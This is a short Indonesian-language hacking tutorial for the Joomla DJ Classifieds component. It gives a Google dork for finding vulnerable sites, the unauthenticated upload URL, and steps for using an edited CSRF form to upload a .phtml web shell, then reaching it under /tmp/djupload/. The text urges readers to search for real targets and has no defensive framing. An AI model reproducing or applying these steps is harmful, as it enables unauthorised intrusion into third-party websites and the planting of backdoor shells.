Dork: inurl:/com_djclassifieds
CSRF: Ada ibu ibu gaes
Exploit: index.php?option=com_djclassifieds&task=upload&tmpl=component
~ Pertama dorking dengan dork diatas
~ Pilih target lalu tempel exploitnya
Contoh: localhost/index.php?option=com_djclassifieds&task=upload&tmpl=component
~ Tampilan jika web nya vuln seperti ini
~ Edit script CSRF nya, di bagian "target-mu.com" ganti dengan web target mu
~ Jika sudah buka CSRF nya di browser lalu upload shell kalian yg ber ekstensi phtml, ganti dulu gayn Ext Shell mu h3h3 (NB: Disarankan upload mini shell atau uploader dulu agar tidak pecah pecah)
~ Jika berhasil di upload tampilan akan sama seperti tampilan awal
~ Akses shell nya? Ada di localhost/tmp/djupload/upgan.phtml
Ingat! Gk 100% berhasil ya zeyenk santuy aja cari targetnya karena Tuhan menyukai hambanya yang santuy
